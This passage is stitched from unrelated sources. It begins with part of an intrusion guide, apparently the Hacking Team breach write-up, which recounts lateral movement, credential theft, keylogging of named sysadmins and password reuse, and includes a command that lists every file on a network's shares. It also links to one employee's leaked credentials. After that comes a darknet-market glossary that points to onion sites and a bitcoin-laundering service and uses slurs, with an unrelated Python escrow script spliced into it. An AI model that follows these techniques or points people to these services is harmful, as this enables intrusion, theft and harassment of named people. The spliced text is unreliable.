    [7] https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py
    [8] https://www.trustedsec.com/june-2015/no_psexec_needed/
    [9] http://www.powershellempire.com/?page_id=124
    [10] http://www.maquinasvirtuales.eu/ejecucion-remota-con-powershell/
    [11] https://adsecurity.org/?p=2277
    [12] https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems
    [13] https://github.com/PowerShellEmpire/Empire/blob/master/lib/modules/lateral_movement/new_gpo_immediate_task.py

    "In place" Movement:

    1) Token Stealing

    Once you have admin access on a computer, you can use the tokens of the other
    users to access resources in the domain. Two tools for doing this are
    incognito [1] and the mimikatz token::* commands [2].

    2) MS14-068

    You can take advantage of a validation bug in Kerberos to generate Domain
    Admin tickets [3][4][5].

    3) Pass the Hash

    If you have a user's hash, but they're not logged in, you can use
    sekurlsa::pth [2] to get a ticket for the user.

    4) Process Injection

    Any RAT can inject itself into other processes. For example, the migrate
    command in meterpreter and pupy [6], or the psinject [7] command in
    powershell empire. You can inject into the process that has the token you
    want.

    5) runas

    This is sometimes very useful since it doesn't require admin privileges. The
    command is part of windows, but if you don't have a GUI you can use
    powershell [8].
    [1] https://www.indetectables.net/viewtopic.php?p=211165
    [2] https://adsecurity.org/?page_id=1821
    [3] https://github.com/bidord/pykek
    [4] https://adsecurity.org/?p=676
    [5] http://www.hackplayers.com/2014/12/CVE-2014-6324-como-validarse-con-cualquier-usuario-como-admin.html
    [6] https://github.com/n1nj4sec/pupy
    [7] http://www.powershellempire.com/?page_id=273
    [8] https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps1

    ----[ 13.2 - Persistence ]------------------------------------------------------

    Once you have access, you want to keep it. Really, persistence is only a
    challenge for assholes like Hacking Team who target activists and other
    individuals. To hack companies, persistence isn't needed since companies
    never sleep. I always use Duqu 2 style "persistence", executing in RAM on a
    couple high-uptime servers. On the off chance that they all reboot at the
    same time, I have passwords and a golden ticket [1] as backup access. You can
    read more about the different techniques for persistence in windows here
    [2][3][4]. But for hacking companies, it's not needed and it increases the
    risk of detection.

    [1] http://blog.cobaltstrike.com/2014/05/14/meterpreter-kiwi-extension-golden-ticket-howto/
    [2] http://www.harmj0y.net/blog/empire/nothing-lasts-forever-persistence-with-empire/
    [3] http://www.hexacorn.com/blog/category/autostart-persistence/
    [4] https://blog.netspi.com/tag/persistence/

    ----[ 13.3 - Internal reconnaissance ]------------------------------------------

    The best tool these days for understanding windows networks is Powerview [1].
    It's worth reading everything written by its author [2], especially [3], [4],
    [5], and [6]. Powershell itself is also quite powerful [7]. As there are still
    many windows 2000 and 2003 servers without powershell, you also have to learn
    the old school [8], with programs like netview.exe [9] or the windows builtin
    "net view".
    Other techniques that I like are:

    1) Downloading a list of file names

    With a Domain Admin account, you can download a list of all filenames in the
    network with powerview:
    Invoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ |
    select-string '^(.*) \t-' |
    %{dir -recurse $_.Matches[0].Groups[1] | select fullname | out-file -append files.txt}

    Later, you can read it at your leisure and choose which files to download.

    2) Reading email

    As we've already seen, you can download email with powershell, and it has a
    lot of useful information.

    3) Reading sharepoint

    It's another place where many businesses store a lot of important
    information. It can also be downloaded with powershell [10].

    4) Active Directory [11]

    It has a lot of useful information about users and computers. Without being
    Domain Admin, you can already get a lot of info with powerview and other
    tools [12]. After getting Domain Admin, you should export all the AD
    information with csvde or another tool.

    5) Spy on the employees

    One of my favorite hobbies is hunting sysadmins. Spying on Christian Pozzi
    (one of Hacking Team's sysadmins) gave me access to a Nagios server which
    gave me access to the rete sviluppo (development network with the source
    code of RCS). With a simple combination of Get-Keystrokes and
    Get-TimedScreenshot from PowerSploit [13], Do-Exfiltration from nishang [14],
    and GPO, you can spy on any employee, or even on the whole domain.
    [1] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
    [2] http://www.harmj0y.net/blog/tag/powerview/
    [3] http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/
    [4] http://www.harmj0y.net/blog/redteaming/powerview-2-0/
    [5] http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/
    [6] http://www.slideshare.net/harmj0y/i-have-the-powerview
    [7] https://adsecurity.org/?p=2535
    [8] https://www.youtube.com/watch?v=rpwrKhgMd7E
    [9] https://github.com/mubix/netview
    [10] https://blogs.msdn.microsoft.com/rcormier/2013/03/30/how-to-perform-bulk-downloads-of-files-in-sharepoint/
    [11] https://adsecurity.org/?page_id=41
    [12] http://www.darkoperator.com/?tag=Active+Directory
    [13] https://github.com/PowerShellMafia/PowerSploit
    [14] https://github.com/samratashok/nishang

    --[ 14 - Hunting Sysadmins ]----------------------------------------------------

    Reading their documentation about their infrastructure [1], I saw that I was
    still missing access to something important - the "Rete Sviluppo", an
    isolated network with the source code for RCS. The sysadmins of a company
    always have access to everything, so I searched the computers of Mauro Romeo
    and Christian Pozzi to see how they administer the Sviluppo network, and to
    see if there were any other interesting systems I should investigate. It was
    simple to access their computers, since they were part of the windows domain
    where I'd already gotten admin access. Mauro Romeo's computer didn't have any
    ports open, so I opened the port for WMI [2] and executed meterpreter [3]. In
    addition to keylogging and screen scraping with Get-Keystrokes and
    Get-TimedScreenshot, I used many /gather/ modules from metasploit,
    CredMan.ps1 [4], and searched for interesting files [5]. Upon seeing that
    Pozzi had a Truecrypt volume, I waited until he'd mounted it and then copied
    off the files. Many have made fun of Christian Pozzi's weak passwords (and of
    Christian Pozzi in general, he provides plenty of material [6][7][8][9]).
    I included them in the leak as a false clue, and to laugh at him. The reality
    is that mimikatz and keyloggers view all passwords equally.

    [1] http://hacking.technology/Hacked%20Team/FileServer/FileServer/Hackingteam/InfrastrutturaIT/
    [2] http://www.hammer-software.com/wmigphowto.shtml
    [3] https://www.trustedsec.com/june-2015/no_psexec_needed/
    [4] https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Credentials-d44c3cde
    [5] http://pwnwiki.io/#!presence/windows/find_files.md
    [6] http://archive.is/TbaPy
    [7] http://hacking.technology/Hacked%20Team/c.pozzi/screenshots/
    [8] http://hacking.technology/Hacked%20Team/c.pozzi/Desktop/you.txt
    [9] http://hacking.technology/Hacked%20Team/c.pozzi/credentials/

    --[ 15 - The bridge ]-----------------------------------------------------------

    Within Christian Pozzi's Truecrypt volume, there was a textfile with many
    passwords [1]. One of those was for a Fully Automated Nagios server, which
    had access to the Sviluppo network in order to monitor it. I'd found the
    bridge I needed. The textfile just had the password to the web interface,
    but there was a public code execution exploit [2] (it's an unauthenticated
    exploit, but it requires that at least one user has a session initiated, for
    which I used the password from the textfile).

    [1] http://hacking.technology/Hacked%20Team/c.pozzi/Truecrypt%20Volume/Login%20HT.txt
    [2] http://seclists.org/fulldisclosure/2014/Oct/78

    --[ 16 - Reusing and resetting passwords ]--------------------------------------

    Reading the emails, I'd seen Daniele Milan granting access to git repos. I
    already had his windows password thanks to mimikatz. I tried it on the git
    server and it worked. Then I tried sudo and it worked. For the gitlab server
    and their twitter account, I used the "forgot my password" function along
    with my access to their mail server to reset the passwords.
    --[ 17 - Conclusion ]-----------------------------------------------------------

    That's all it takes to take down a company and stop their human rights
    abuses. That's the beauty and asymmetry of hacking: with 100 hours of work,
    one person can undo years of work by a multi-million dollar company. Hacking
    gives the underdog a chance to fight and win.

    Hacking guides often end with a disclaimer: this information is for
    educational purposes only, be an ethical hacker, don't attack systems you
    don't have permission to, etc. I'll say the same, but with a more rebellious
    conception of "ethical" hacking. Leaking documents, expropriating money from
    banks, and working to secure the computers of ordinary people is ethical
    hacking. However, most people that call themselves "ethical hackers" just
    work to secure those who pay their high consulting fees, who are often those
    most deserving to be hacked.

    Hacking Team saw themselves as part of a long line of inspired Italian design
    [1]. I see Vincenzetti, his company, his cronies in the police, Carabinieri,
    and government, as part of a long tradition of Italian fascism. I'd like to
    dedicate this guide to the victims of the raid on the Armando Diaz school,
    and to all those who have had their blood spilled by Italian fascists.

    [1] https://twitter.com/coracurrier/status/618104723263090688

    --[ 18 - Contact ]--------------------------------------------------------------

    To send me spear phishing attempts, death threats in Italian [1][2], and to
    give me 0days or access inside banks, corporations, governments, etc.
    [1] http://andres.delgado.ec/2016/01/15/el-miedo-de-vigilar-a-los-vigilantes/
    [2] https://twitter.com/CthulhuSec/status/619459002854977537

    only encrypted email please: https://securityinabox.org/es/thunderbird_usarenigmail

    If not you, who? If not now, when?

    DarkNet Dictionary!

    For those of you who are just beginning with the darknet markets, we have compiled a list of the terms you might come across while browsing around, including links to important resources. Is a term missing here? Let us know! Does something need fixing? Contact us or leave a comment. Thanks to the redditors / mods who helped us compile this list; we will keep it growing and updating.

    3DD – 3 Day delivery.

    420 – From wikipedia: is a code-term used primarily in North America that refers to the consumption of cannabis and by extension, as a way to identify oneself with cannabis subculture or simply cannabis itself. Observances based on the number 420 include smoking cannabis around the time 4:20 p.m. (with some sources also indicating 4:20 a.m

    4/20 – 20th of April sale – also known as the special sale during which the vendor Tony76 executed the most famous scam on Silk Road.

    Administrator – In charge of a collection of services a year or two ago, including TorStatusNet, Hidden Image Board, a hosting service.

    Altcoin – Any digital cryptocurrency other than Bitcoin.

    Anonymity – This thing you want to have if you don't want to be found while using dark net markets.

    AnonFiles – File upload site. You want to send a PDF/image/whatever to another user? Upload it to anonfiles, then you can share your custom link, and whoever you send it to can download your file anonymously.

    Astrid – Creator and Moderator of /r/DarkNetMarkets, very promiscuous has had relations with all Moderators there, also is the CSS guru!

    Avengers – A group of individuals who are well known for ordering LSD from many vendors back in the day of Silk Road 1.0, reagent testing it, consuming it, and writing reviews about the quality of the products. They currently can be found on the deep web on the Majestic Garden forum.

    AYB – All You’re Base, general Onionland portal

    AYW – THW without the CP. Known formally as All You’re Wiki. Most people use it now.

    Backopy – The Administrator of Black Market Reloaded (BMR)

    Bergie Web – The level of the internet hierarchy that comes between the “surface” and the “deep web,” if you are comparing the internet to an ocean. This includes porn, chans, and other sites that provide you with information on how to access the deep web. Peer-to-peer file sharing networks are also part of this level.

    Bitcoinfog – “Wash” your bitcoins. Bitcoins can be traced, so let’s say you received bitcoins from an illegal activity: those coins can be traced back to you if you use them on another website that is linked to your real identity (localbitcoins, paypal, bitstamp, MtGox etc). This handy website will erase all traces on your coins. The service is accessible here: http://fogcore5n3ov3tui.onion

    Bitcoins – an open source, peer-to-peer payment network and pseudo-anonymous digital currency being used for almost all transaction on the darknet.

    Black Market Reloaded – Also known as BMR, the oldest dark net market since Silk Road was shut down; the site is currently offline and planned to be back with a newer version.

    Blockchain – Wikipedia definition: A block chain is a transaction database shared by all nodes participating in a system based on the Bitcoin protocol.

    BotDW – Boss of the Deep Web

    Buyers – Marketplace user that is not a vendor. (duh)

    Carding – The practice of stealing and selling credit card information

    CD (Controlled Delivery) – The technique of controlled delivery is used when a consignment of illicit drugs is detected and allowed to go forward under the control and surveillance of law enforcement officers in order to secure evidence against the organizers of such illicit drug traffic.

    Cirrus – A Silk Road forum moderator.

    Chisquare/psi – Hugest faggot, avoid him more. Hosts numerous services. (Its not us who said this!)

    Cipherspace – tor hidden services / i2p / freenet / any other anonymity network

    Cold Storage – a secure offline wallet for your Bitcoins or other cryptocurrencies

    CP – When mentioned in the context of the deep web, it usually means child pornography, something you should know about and avoid at all cost when browsing around.

    Clearnet – regular internet (non-Tor)

    Cryptography – All the means of hiding and encrypting the data that you send over the internet.

    Crypto News – (http://wittvywowuxp35s6.onion) is a hidden service for news about privacy, security, politics and technology. The owner only updates sporadically and focuses a lot on I2P.

    Dark Net – A general term that describes the hidden websites hosted on Tor, I2P and other networks that you cannot access with a regular internet connection without special software, and that do not get crawled by Google and other search engines. More info can be found here

    Dark Nexus – HTTP Refresh Chat

    DarkNetMarkets – A subreddit meant for the discussion of the various Dark Net markets, can be found at this link.

    DDOS Attack – Denial-of-service attack: an attempt to make a machine or network resource unavailable to its intended users. Such attacks were common on Silk Road, and some say one was used to locate the server using a known Tor vulnerability. Read the Wikipedia page for the technical explanation.

    DBAN – Darik’s Boot and Nuke, software for wiping your hard drive of all information.

    Deep Web – Synonymous with “Dark Net”.

    DeepDotWeb – Us! The site where this list was created, a blog focusing on deep web news; can be found here: http://www.deepdotweb.com

    Defcon – The alias of the Silk Road 2.0 admin. A person named Blake Benthall who was arrested during Operation Onymous is alleged to be him.

    Dispute – In our context, this term is usually used to describe a disagreement between a buyer and a seller on the markets.

    Digitalink – a/k/a Jacob Theodore George IV, according to Homeland Security Investigations (HSI) Digitalink was the first vendor on Silk Road selling illegal drugs to be arrested.

    DoD / Coachella / HH (and some others) – A well-known scammer & troll, was eventually doxxed in some article and has not been seen much since.

    Domestic – A term that refers to making an order from a vendor that resides in the same country as the buyer.

    Donations – You will encounter many requests for them on the darknet markets; they will usually list a bitcoin address.

    Doxx – The act of posting in a public forum the personally identifying information of a pseudonym used by an individual or the information posted therein.

    Dread Pirate Roberts – The pseudonym used by the administrator of the original Silk Road market. It has been speculated that more than one person may have been using this pseudonym, but “Ross William Ulbricht” has been indicted by the FBI as being the sole owner.

    DDG/Duck Duck Go – A search engine that respects privacy.

    Emergency BTC Address — An address to be held on record to send all funds to in case of a market shutdown. This would ideally be a cold storage address with no information that could be used to connect the owner to their identity. This address would only be checked after a market was shut down in order to recover outstanding funds.

    Encryption — Using secret information to make it infeasible, without knowledge of that information, to decipher the ‘cypher-text’ produced back into a plain text message. This can take one of two forms: symmetric encryption, which uses a shared secret that both parties must know in advance, or public key cryptography, where the information used to encrypt differs from the secret needed to decrypt.

    Escrow – the use of a neutral third party to ensure that a transaction payment will be made to a seller on completion of items sent to a buyer. Generally after a purchase is made, the funds are held ‘in escrow’ to be released when the buyer states the seller has met the terms of the purchase. Generally the third party will also offer arbitration in case of a dispute between the two parties.

    Electrum plugin – Used on The Marketplace to create multi signature transactions with a click of a button – full usage instructions can be found in this tutorial.

    Exit Scam – A term used to describe a situation where a market admin or a vendor wants to retire, and is doing so while taking as much money as possible from their users / buyers.

    • Vendors: usually by offering some great deal and abusing the reputation they have gained so far, requiring people not to use the escrow protection and collecting as much money as possible (without sending anything out) before shutting down the store and running with as much BTC as they can.
    • Market admins: usually by locking users’ funds on the market, only to shut it down completely soon after.

    Fagmin/dgft – New Admin Of Torchan

    FBI – the Federal Bureau of Investigation. This is the USA’s federal police agency, which prosecutes violations of federal laws. It does not involve itself in violations of state law.

    FE – Finalize early. This is the release of escrow funds before the seller knows that the conditions of the contract have been met. This is used to reduce seller risk from BTC price fluctuation and against market shutdown. It is also used to scam buyers, as once the escrow has been released there is no recourse for the buyer if the seller does not deliver on their promises.

    Feedback — a message left by a seller for the vendor, or vice versa, about how well a transaction went. It is considered good form not to reveal any information about the methods the seller used to ship the order, nor the vendor’s or seller’s location or details. This is made publicly available to allow users of a site to determine whether they should trust the vendor or seller.

    Flush (Curtis Green) — An individual the FBI accuses Dread Pirate Roberts of ordering to be murdered. This person is also accused of being ‘Chronicpain’ from the Silk Road Forums, and an employee of Silk Road. The details of the allegations can be read here and here; this is also a great resource.

    Freedom Hosting – Huge free web provider. Some of its services hosted child porn. Busted by the feds around the same time SR was busted. SR was also hosted on it for a while before it switched to a dedicated server.

    Freenet – a peer-to-peer platform for censorship-resistant communication.

    FUD – Fear, Uncertainty and Doubt

    Galaxy Deep Web Social Network –  (http://hbjw7wjeoltskhol.onion/) is the currently most active dark net chat, a great place to keep in touch with friends and vendors, share the newest FUD and fuck up your OPSEC while waiting for your order to be shipped.

    Gawker — an online blog that reports on web trends. Notable for being one of the first major sites to report on the existence of the Silk Road on 2011-06-01 at http://gawker.com/the-underground-website-where-you-can-buy-any-drug-imag-30818160

    GCHQ – British Government Communications Headquarters, equivalent to the NSA in the United States.

    Grams –  Cross Marketplace search engine for the DeepWeb (see the sidebar link here)

    HackBB – Famous hacking phpBB board, also hosted downloads for files like zeuS.

    Hard Candy – Infamous page on Hidden Wiki for child porn.

    Harry71 – Onion Spider Robot (http://skunksworkedp2cg.onion/) is a daily updated, extensive list of Onion sites. The owner runs a crawler that checks whether the sites are up, fetches the link and title, and dumps them on his homepage. The site also contains some statistics about uptime and hosts.

    Hidden Service – Another term for a .onion domain name. It can only be accessed through the Tor network, and cannot be seized by a government.

    Honeypot – A hidden service or other website set up by law enforcement in an attempt to attract and trap people who participate in illegal activities. Other cited uses include helping the military and government protect their secrets and the FBI defending large businesses.

    Hushmail – An email provider that focuses on privacy and uses the industry standard protocols PGP and 256-bit AES encryption. It claims to be secure to the extent that not even company employees can read the contents of your emails. Hushmail is known to cooperate with law enforcement by handing over encrypted emails.

    Hidden Wiki – a ‘hidden service’ website on the Tor anonymous network that allows for open editing of subjects related to hidden services and activity in them. “You will never find a more wretched hive of scum and villainy. We must be cautious.”

    Hub Forums – An Onion based platform for cross marketplace discussion, like DNM sub reddit, but forum based and fully anonymous – read the details here.

    I2P — The ‘Invisible Internet Project’. Originally designed as a way to be able to use IRC anonymously, it has become one of the more popular anonymous networks. While similar to Tor, key differences include the fact that I2P focuses on gaining access to sites within the network, and not to the Internet at large. Not as much academic research has been done on this project as on Tor. This service is very popular in Russia; about half the routers appear to be located there. Details can be found at https://geti2p.net

    International – Outside of one’s own country. Some avoid international transactions because customs adds time and risk to an order. Some countries such as Australia are known for having customs that are extremely hard to get an order past.

    ISP –  Internet service provider.

    IRC – Internet Relay Chat. A communication system allowing easy transfer of messages in the form of text. It is intended for group discussion in sessions called channels.

    JB – See hard candy, except for teens.

    Lavabit – A defunct email provider that shut down in August 2013 after being forced to hand over its SSL private keys to the US government.

    LE / LEO’s / LEA’s –  Law Enforcement / Law Enforcement Officers / Law Enforcement Agents

    Library – Usually refers to Tor Library, the largest centralized eBook service on the Darknet.

    Libertas — Pseudonym used by one of the original Silk Road forum administrators, and also used by one of the administrators of Silk Road 2. Arrested by the ‘Garda Siochana’ (Irish police). Details of the arrest may be found at this link.

    Liberte – Another Linux distribution similar to TAILS and Whonix with the purpose of enabling anyone to communicate safely and covertly in hostile environments.

    Litecoins — an alternative cryptocurrency, similar to bitcoin. The key difference is that while bitcoin uses hashcash-SHA256^2 as the ‘proof of work’, litecoin uses hashcash-Scrypt, which is designed to use more memory and be less susceptible to custom hardware designed to solve the problem quickly. More details of this difference may be found at: https://en.bitcoin.it/wiki/Hashcash

    LocalBitcoins — a site designed to allow over-the-counter trading of bitcoins. Famed for its anonymous nature, people who sell on the site have been under constant pressure to avoid being prosecuted as unlicensed money traders. This extra risk and the extra work generally cause a significant price difference between the site and a more open (and regulated) exchange.

    Love Letter – An official confiscation notice from the postal service sent to the recipient, letting him know that his parcel was seized. In some cases, vendors have sent fake love letters to create the false impression of a seized package and scam the buyer.

    Lucyskyhigher  – Reddit mod sexiest biotch on the always informative and largely humorous gathering place for all darknetmarkets, /r/Darknetmarkets

    Marco Polo Task Force – A multi-agency law enforcement task force based in Baltimore, put together to investigate Silk Road, which eventually included investigators from the FBI, DEA, DHS, the IRS, U.S. Postal Inspection, U.S. Secret Service, and the Bureau of Alcohol, Tobacco, Firearms and Explosives.

    Mariana’s Web – Urban legend of a secret website in the deepweb.

    Marketplaces – catch-all term for web sites set up to allow trade between vendors and buyers. When used in the context of the sale of illegal goods, these usually provide anonymity to the buyer and seller, a method of escrow to reduce the risk from new vendors and sellers, and a method of advertising goods to be sold at a price so that a purchase may be initiated and paid for without involvement of the seller. Most markets are also set up as ‘hidden services’ under anonymity networks like Tor, I2P, or Freenet, although there do exist some ‘clearnet’ markets that operate over standard HTTP/HTTPS.

    Mixie – First major service operator on Tor in 2007. Services include a basic message board on the home page, a PM service, a “create your own bbs-like board” system (anyone could create a community for free) called SnapBBS, and a few more features. Also hosted an OnionNet IRC server.

    Molly – any damned thing you can shove into a gelcap and get somebody to buy. In theory, this is supposed to be MDMA in the gelcap, but more commonly you get something like methylone, BZP, a benzofuran, talc, or something potentially toxic like PMA. Test first before consuming, http://dancesafe.org/health-and-safety/adulterant-screening-kit-instructions is a good resource.

    Monero – a newer more privacy focused cryptocurrency that’s being accepted by some darknet markets.

    MSM – Main Stream Media — Big news outlets designed for common consumption by the masses. These can range from more neutral sites like the BBC in the UK, Al Jazeera in the Middle East, or The New York Times in the USA, to sites like the Daily Fail, Fox News, or Pravda, which are not as well known for vetting their news articles.

    MtGox – Magic: The Gathering Online eXchange. One of the first public exchanges between bitcoins and currencies such as USD. Because it was designed in haste, it has been plagued with security issues. Widely considered to be completely insolvent, a lack of transparency has allowed constant rumour to circulate. They are no longer taking exchanges after claiming to have been defrauded by outside parties taking advantage of quirks in the bitcoin protocol.

    Multi Signature Escrow – Where an address is signed by both the buyer and the seller with their private keys. The buyer sends funds to the address and the seller ships the product. If both parties are happy, they sign off on the address and release the funds in escrow. You can see an example of such an open source service here.

    Nameless – IRC server hosted by chi. No identities, all usernames randomly generated.

    Nekro – Huge faggot, avoid him. (he said this, not us!)

    MTLjohn – Was a funny scammer on SR1; he kept popping up again and again under different identities, only to be exposed each time by another vendor (LuckyLuciano), since he was so easy to provoke.

    NDD –  Next day delivery.

    Onion – a hidden website using the Tor network. Name comes from the ‘onion routing’ used by tor. The url is composed of a hash of information used to identify the correct system, so most addresses are somewhat random. While creating an onion is easy, and the routing itself has few known weaknesses, securing such a site to leak no information is exceptionally difficult.

    Onion Browser — A web browser like the Tor Browser Bundle (TBB). A web browser designed to work with the tor network to browse hidden services and normal websites anonymously, without leaking user information. While easier to use properly without leaking information, bugs in a browser can cause serious problems, such as the javascript bug that was used in part to shut down Freedom Hosting.

    OnionForum – The original forum for Tor created by Legith in the early days of ’05.

    Onionland – A general term to describe tor hidden services

    OnionNet – First real IRC network designed for Onionland. All IRC ops are pedophiles though. Long history but not many people use it anymore.

    Onion Routing – A technique for anonymous communication over a computer network. Messages are repeatedly encrypted and sent through multiple network nodes. The process is comparable to peeling an onion: each node removes a layer of encryption, uncovering routing instructions for the following layer.

    Onion patch – A saying for using the DNMs on /r/drugs.

    opDarknet – Campaign launched by Anonymous a couple years ago. Targeted child porn sites as well as Freedom Hosting.

    Operation Onymous – A global crackdown on the darknet markets during November 2014, in which many sites were seized and several people arrested.

    Optimus Crime/OC – Admin of HackBB.

    OPSEC – Operations Security. The process of protecting little pieces of data that could be grouped together to form a bigger picture, or expose your identity.

    OrBot – a mobile version of the Tor router for Android. Can be found on the Google Play store. Designed to either work with its own browser, or be set up to work as a proxy for any app that supports it. Can also be used on a rooted device to provide a transparent proxy that forces all apps to connect through Tor.

    OS –  Operating system.

    Pastebin – A website used to store text for a certain period of time. It is popular on the deep web because it is an easy way to anonymously share information.

    Parallel construction – Parallel construction is a law enforcement process of building a parallel – or separate – evidentiary basis for a criminal investigation in order to conceal how the investigation began.

    PGP/GPG – Pretty Good Privacy / Gnu Privacy Guard. PGP was introduced in 1991, and was formalized with RFC 2440 and RFC 4880. Uses a combination of public-key and symmetric-key cryptography to ensure that messages can be delivered without a third party gaining access to their contents. It also allows a message to be signed so that the author of the message is indisputable. Many different algorithms can be used for the encryption, but the most commonly used are RSA for the public key crypto and AES for the symmetric cipher. It is extremely important that the public key of any party be fully verified in order to know that the message is being delivered to the correct recipient or is from the correct sender. Here we have a simple usage guide for Windows.

    P2P Escrow – Most commonly used to refer to transactions using ‘P2SH’ addresses as defined by BIP 016. A public key is provided by each of the buyer, the market, and the vendor, and used to create an address which requires two of the three parties to sign in order to redeem. The buyer then pays to this address. Of extreme importance is the ‘redeemScript’, which details the information needed to redeem funds sent to the address; the address itself is a hash of the redeemScript. The goal of this method is that no one party has enough information to take funds from these P2SH addresses. Even if the market is hacked or taken down, the funds cannot be seized, and a buyer and seller can, with the redeemScript, finalize a transaction outside of the market’s involvement if they choose to.
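
    As an added illustration of the 2-of-3 P2SH construction described in this entry and under ‘Multi Signature Escrow’ above (example code, not from the glossary’s source or from any market), the following Python builds the redeemScript, the on-chain scriptPubKey and the ‘3…’ deposit address from three public keys, and shows the check a buyer can run to confirm that a displayed address really commits to the expected keys. The three keys are constructed placeholders, not real curve points, and the example assumes the standard library’s ripemd160 is available.

```python
"""
2-of-3 pay-to-script-hash (P2SH, BIP 16) escrow as the glossary describes it:
buyer, market and vendor each provide a public key, the redeemScript demands
any two signatures, and the deposit address commits only to hash160(redeemScript).
Added example; the public keys are constructed placeholders, not real curve points.
"""
import hashlib

OP_2, OP_3 = 0x52, 0x53
OP_HASH160, OP_EQUAL, OP_CHECKMULTISIG = 0xA9, 0x87, 0xAE
P2SH_VERSION = 0x05  # mainnet P2SH prefix; encodes to a leading '3'
B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def hash160(data: bytes) -> bytes:
    """RIPEMD160(SHA256(data)): the 20-byte digest a P2SH address commits to."""
    return hashlib.new("ripemd160", hashlib.sha256(data).digest()).digest()


def build_2of3_redeem_script(pubkeys: list[bytes]) -> bytes:
    """OP_2 <pk1> <pk2> <pk3> OP_3 OP_CHECKMULTISIG, each key pushed with a
    one-byte length prefix (0x21 for a 33-byte compressed key). Key order is
    part of the script: reorder the keys and you get a different address."""
    if len(pubkeys) != 3:
        raise ValueError("2-of-3 escrow needs exactly three public keys")
    script = bytes([OP_2])
    for pk in pubkeys:
        if len(pk) not in (33, 65):
            raise ValueError("public key must be 33 (compressed) or 65 bytes")
        script += bytes([len(pk)]) + pk
    return script + bytes([OP_3, OP_CHECKMULTISIG])


def p2sh_script_pubkey(redeem_script: bytes) -> bytes:
    """The on-chain locking script: OP_HASH160 <20-byte hash> OP_EQUAL.
    Only the hash is public; the redeemScript is revealed at spend time, which
    is why a buyer and seller who hold it can settle without the market."""
    digest = hash160(redeem_script)
    return bytes([OP_HASH160, len(digest)]) + digest + bytes([OP_EQUAL])


def base58check_encode(version: int, payload: bytes) -> str:
    raw = bytes([version]) + payload
    raw += hashlib.sha256(hashlib.sha256(raw).digest()).digest()[:4]
    n = int.from_bytes(raw, "big")
    out = ""
    while n:
        n, rem = divmod(n, 58)
        out = B58_ALPHABET[rem] + out
    leading_zeros = len(raw) - len(raw.lstrip(b"\x00"))
    return "1" * leading_zeros + out


def base58check_decode(addr: str) -> tuple[int, bytes]:
    """Return (version, payload); raise ValueError on a bad checksum."""
    n = 0
    for ch in addr:
        idx = B58_ALPHABET.find(ch)
        if idx < 0:
            raise ValueError(f"invalid base58 character {ch!r}")
        n = n * 58 + idx
    raw = n.to_bytes((n.bit_length() + 7) // 8, "big")
    raw = b"\x00" * (len(addr) - len(addr.lstrip("1"))) + raw
    body, checksum = raw[:-4], raw[-4:]
    if hashlib.sha256(hashlib.sha256(body).digest()).digest()[:4] != checksum:
        raise ValueError("base58check checksum mismatch")
    return body[0], body[1:]


def p2sh_address(redeem_script: bytes) -> str:
    return base58check_encode(P2SH_VERSION, hash160(redeem_script))


def redeem_script_matches_address(redeem_script: bytes, addr: str) -> bool:
    """Buyer-side check before paying: does the address the market displays
    really commit to a script built from the keys you expect? A swapped-in
    script, a reordered key set or a mistyped address all return False."""
    try:
        version, payload = base58check_decode(addr)
    except (ValueError, IndexError):
        return False
    return version == P2SH_VERSION and payload == hash160(redeem_script)


# Constructed placeholder keys: right shape (0x02/0x03 + 32 bytes), not real.
BUYER_PK = b"\x02" + hashlib.sha256(b"placeholder buyer key").digest()
MARKET_PK = b"\x03" + hashlib.sha256(b"placeholder market key").digest()
VENDOR_PK = b"\x02" + hashlib.sha256(b"placeholder vendor key").digest()
ESCROW_KEYS = [BUYER_PK, MARKET_PK, VENDOR_PK]

if __name__ == "__main__":
    rs = build_2of3_redeem_script(ESCROW_KEYS)
    addr = p2sh_address(rs)
    print("redeemScript :", rs.hex())
    print("deposit addr :", addr)
    print("matches      :", redeem_script_matches_address(rs, addr))
```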

    Phishing – the act of using social engineering techniques to get private information such as user names and passwords. An example would be to send out a message claiming to be from an administrator asking for a password, or to set up a fraudulent website that looks like a well-known market’s site in order to harvest user name and password information.

    Pidgin OTR – Secure instant messaging software. Pidgin is a free and open source client that lets you organize and manage your different Instant Messaging (IM) accounts using a single interface. The Off-the-Record (OTR) plug-in designed for use with Pidgin ensures authenticated and secure communications between Pidgin users.

    PIN Code – Personal Identification Number Code. Used as a secondary validation method to protect against loss of funds if the username and password are discovered. Generally it is only asked for during transfer of funds outside the market or to confirm and finalize orders.

    PM / DM – Personal message / Direct message.

    Processing Time – time required by a market or vendor in order to complete a transaction. Generally this involves waiting for sufficient confirmations on the blockchain to ensure a deposit has been received, or running funds through a bitcoin mixer on the market. Also used for the time a vendor needs, once a transaction comes in, to put the goods into the post.

    Project Black Flag – Market set up shortly after the fall of the original Silk Road. Widely suspected to be a scam, this was confirmed to be the case after a short period of time.

    Proxy – Unlike a VPN, a proxy is a service that only changes the IP address websites can see within your web browser, rather than on all applications on your computer.

    RAT (Remote Administration Tool) – A piece of software that allows a remote operator to control a system as if he has physical access to that system.

    RC (Research chemicals) – From Wikipedia: research chemicals are chemical substances used by scientists for medical and scientific research purposes. One characteristic of a research chemical is that it is for laboratory research use only; a research chemical is not intended for human or veterinary use.

    Resolution – Used when there is a dispute between a buyer and seller. This usually involves the market in question serving as an arbitrator to determine how funds are to be released from escrow.

    Reviews – the corpus of feedback left on a site, along with further information gained through outside channels. Used by buyers to determine whether they should treat a vendor or buyer as legitimate.

    Riseup / Safe-mail – Excellent e-mail services.

    Ross Ulbricht — Accused by the FBI of being the sole owner of the pseudonym ‘Dread Pirate Roberts’ and creator of the Silk Road. He was an Eagle Scout and a known libertarian. The original Silk Road website went down after his arrest.

    RTS – Return to sender.

    Shadow Web – A mythical part of the dark web that’s been perpetuated by creepypastas. Supposedly allows you to access an even darker network containing red rooms and cannibalism forums.

